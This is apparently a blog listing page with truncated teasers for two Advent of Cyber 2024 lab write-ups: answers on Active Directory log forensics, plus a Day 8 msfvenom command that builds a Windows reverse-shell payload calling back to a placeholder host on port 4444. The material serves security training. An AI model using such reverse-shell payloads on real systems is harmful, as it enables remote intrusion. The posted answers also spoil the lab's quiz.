Showing 63 Result(s)

Advent of Cyber 2024 Day 15: Be it ever so heinous, there’s no place like Domain Controller.

Lab link. Questions 1. On what day was Glitch_Malware last logged in? Answer format: DD/MM/YYYY 07/11/2024 2. What event ID shows the login of the Glitch_Malware user? 4624 3. Read the PowerShell history of the Administrator account. What was the command that was used to enumerate Active Directory users? notepad “$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt” Get-ADUser -Filter * -Properties …

Advent of Cyber 2024 Day 8: Shellcodes of the world, unite!

Lab link. Questions 1. What is the flag value once Glitch gets reverse shell on the digital vault using port 4444? Note: The flag may take around a minute to appear in the C:\Users\glitch\Desktop directory. You can view the content of the flag by using the command type C:\Users\glitch\Desktop\flag.txt. msfvenom -p windows/x64/shell_reverse_tcp LHOST=Your_IP LPORT=4444 -f powershell Let’s copy …